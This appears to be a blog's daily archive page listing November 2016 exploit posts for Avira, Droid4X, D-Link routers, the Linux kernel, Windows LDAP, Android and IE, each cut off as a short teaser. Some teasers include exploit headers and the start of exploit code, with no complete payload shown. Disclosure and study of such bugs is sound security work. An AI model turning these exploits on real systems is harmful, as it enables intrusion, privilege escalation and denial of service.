Daily Archives: November 13, 2016

Avira Antivirus 15.0.21.86 – ‘.zip’ Directory Traversal / Command Execution Exploit

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: R-73eN

# Title: Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)

# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 – Reported to Vendor through Bugcrowd.
# 2016-06-29 – Vendor Replied.
# 2016-07-05 – Vendor Replicated the vulnerability.
# 2016-09-02 – Vendor released updated […]

By |November 13th, 2016|Exploits|

Droid4X Privilege Escalation Vulnerability


Credits: CT-Zer0 Team

# Exploit Title: Droid4X Unquoted Service Path Privilege Escalation

# Category: local
# Vendor Homepage: http://www.droid4x.com/
# Software Link: http://dl.haima.me/download/DXDown/win/Z001/Droid4XInstaller.exe
# Tested on: Windows 7 x86/x64

1. Description

Droid4XService (Droid4XService.exe) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged […]


DLink ADSL Router DSL-2750E SEA_1.07 Remote File Disclosure Vulnerability


Credits: Todor Donev

#!/bin/sh
#
#  D-Link ADSL ROUTER DSL-2750E SEA_1.07
#  Remote File Disclosure
#
#  Modem Name:               DSL-2750E
#  Firmware Version:         SEA_1.07

#
#  Disclaimer:
#  This or previous programs are for Educational
#  purpose ONLY. Do not use them without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor […]


Linux Kernel – TCP Related Read Use-After-Free Exploit


Credits: Marco Grassi

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
 
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif

long r;

int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
 
        if […]


Microsoft Windows Server 2008 / 2012 – LDAP RootDSE Netlogon Denial Of Service (PoC)


Credit: Todor Donev

#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/2012/2012 R2 AD LDAP RootDSE Netlogon
#  (CLDAP “AD Ping”) query reflection DoS PoC
#
#  MS Windows Server 2016
#
#  Description:
#  The attacker sends a simple query to a vulnerable reflector
#  supporting the Connectionless LDAP […]


Android Proxy Auto Config (PAC) Crash Vulnerability


Credits: Yakov Shafranovich

Summary

Android devices can be crashed, forcing a halt and then a soft reboot,
by downloading a large proxy auto config (PAC) file when adjusting the
Android networking settings. This can also be exploited by an MITM
attacker that can intercept and replace the PAC file. However, the […]


Microsoft Internet Explorer WININET.dll


Credits: SkyLined

Synopsis

A specially crafted HTTP response can cause the CHttpHeaderParser::ParseStatusLine method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET […]
